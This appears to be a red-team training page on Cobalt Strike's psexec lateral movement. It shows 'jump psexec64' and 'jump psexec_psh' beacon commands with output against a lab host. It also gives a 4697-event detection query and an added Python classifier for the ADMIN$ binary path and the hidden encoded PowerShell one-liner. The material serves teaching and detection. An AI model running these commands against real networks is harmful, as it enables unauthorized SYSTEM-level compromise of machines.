PsExec
The psexec / psexec64 commands work by uploading a service binary to the target system, then creating and starting a Windows service to execute that binary. Beacons executed this way run as SYSTEM.
beacon> jump psexec64 web.dev.cyberbotic.io smb
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10) on web via Service Control Manager (\\web\ADMIN$\768870c.exe)
Started service 768870c on web.dev.cyberbotic.io
[+] established link to child beacon: 10.10.122.30
A reliable way of searching for PsExec is to look for 4697 (service installed) events. These are often quite rare on a host, unless a service arrives with a software installation or something similar. Cobalt Strike generates a random 7-character alphanumeric string which it uses for both the service name and the binary filename. When setting the binPath for the service, it uses a UNC path to the ADMIN$ share.
event.code: 4697 and winlog.event_data.ServiceFileName: \\\\*\\ADMIN$\\*.exe
psexec_psh doesn't copy a binary to the target, but instead executes a PowerShell one-liner (always 32-bit). The pattern it uses by default is %COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand ...
beacon> jump psexec_psh web smb
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10) on web via Service Control Manager (PSH)
Started service bd119dd on web
[+] established link to child beacon: 10.10.122.30
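The two detection opportunities above (the ADMIN$ UNC path in 4697 events for psexec, and the %COMSPEC% PowerShell one-liner for psexec_psh) as a small classifier. This is an added example, not part of the course page or Cobalt Strike; the events are constructed to mirror the winlog fields the KQL query keys on, and it assumes the psexec_psh one-liner shows up as the ServiceFileName of the 4697 event.

```python
import re

# Default Cobalt Strike psexec: UNC path to ADMIN$ with a random 7-char alphanumeric name
PSEXEC_BINARY = re.compile(r"^\\\\[^\\]+\\ADMIN\$\\[A-Za-z0-9]{7}\.exe$", re.IGNORECASE)
# Generic form of the KQL query on this page: any .exe served from a remote ADMIN$ share
ADMIN_SHARE_EXE = re.compile(r"^\\\\[^\\]+\\ADMIN\$\\.*\.exe$", re.IGNORECASE)
# psexec_psh default: %COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand ...
PSEXEC_PSH = re.compile(
    r"%COMSPEC%\s+/b\s+/c\s+start\s+/b\s+/min\s+powershell\s+-nop\s+-w\s+hidden\s+-encodedcommand",
    re.IGNORECASE,
)

def classify_4697(event):
    """Return a label for a suspicious 4697 (service installed) event, or None if benign."""
    if event.get("event.code") != 4697:
        return None
    data = event.get("winlog.event_data", {})
    path = data.get("ServiceFileName", "")
    name = data.get("ServiceName", "")
    if PSEXEC_PSH.search(path):
        return "psexec_psh"
    if PSEXEC_BINARY.match(path):
        # Cobalt Strike reuses the same random string for service name and binary name
        stem = path.rsplit("\\", 1)[-1][:-4]
        if stem.lower() == name.lower():
            return "psexec (cobalt strike default)"
    if ADMIN_SHARE_EXE.match(path):
        return "psexec (binary on ADMIN$)"
    return None

# Constructed sample events (not real telemetry) shaped like the fields the query uses
SAMPLE_EVENTS = [
    {"event.code": 4697, "winlog.event_data": {"ServiceName": "768870c",
        "ServiceFileName": r"\\web\ADMIN$\768870c.exe"}},
    {"event.code": 4697, "winlog.event_data": {"ServiceName": "bd119dd",
        "ServiceFileName": r"%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand <base64>"}},
    {"event.code": 4697, "winlog.event_data": {"ServiceName": "Sysmon64",
        "ServiceFileName": r"C:\Windows\Sysmon64.exe"}},
    {"event.code": 7045, "winlog.event_data": {"ServiceName": "x",
        "ServiceFileName": r"\\web\ADMIN$\abcdefg.exe"}},  # wrong event code, ignored
]

def scan(events):
    """Return (service name, label) for every event the classifier flags."""
    return [(e["winlog.event_data"]["ServiceName"], label)
            for e in events if (label := classify_4697(e))]
```

Running scan(SAMPLE_EVENTS) flags only the 768870c and bd119dd services; the Sysmon install and the 7045 event pass through.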